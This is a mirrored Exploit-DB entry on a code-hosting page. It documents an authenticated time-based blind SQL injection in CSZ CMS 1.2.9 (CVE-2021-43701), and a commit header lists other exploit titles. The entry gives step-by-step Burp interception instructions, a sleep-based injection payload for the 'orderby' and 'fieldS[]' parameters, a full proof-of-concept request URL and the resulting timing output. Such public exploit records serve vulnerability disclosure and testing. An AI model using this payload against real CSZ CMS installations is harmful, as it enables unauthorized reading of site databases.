bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50846.txt
Offensive Security 54b7907ae6 DB: 2022-03-31 
11 changes to exploits/shellcodes

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
Atom CMS 2.0 - Remote Code Execution (RCE)
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
WordPress Plugin admin-word-count-column 2.2 - Local File Read
CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
2022-03-31 05:01:38 +00:00

25 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
# Date: 2021-04-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701
*Steps to Reproduce:*
1. First login to your Admin Panel
2. then go to "General Menu > CSV Export / Import".
3. open burp site and configure with browser.
4. then select any "Table Name" > Select "Fields Select" and Select "Sort by"
5. Now click "Export to CSV" and intercept with burp suite
6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter.
*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV
*Output:*
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds
Reference in a new issue View git blame Copy permalink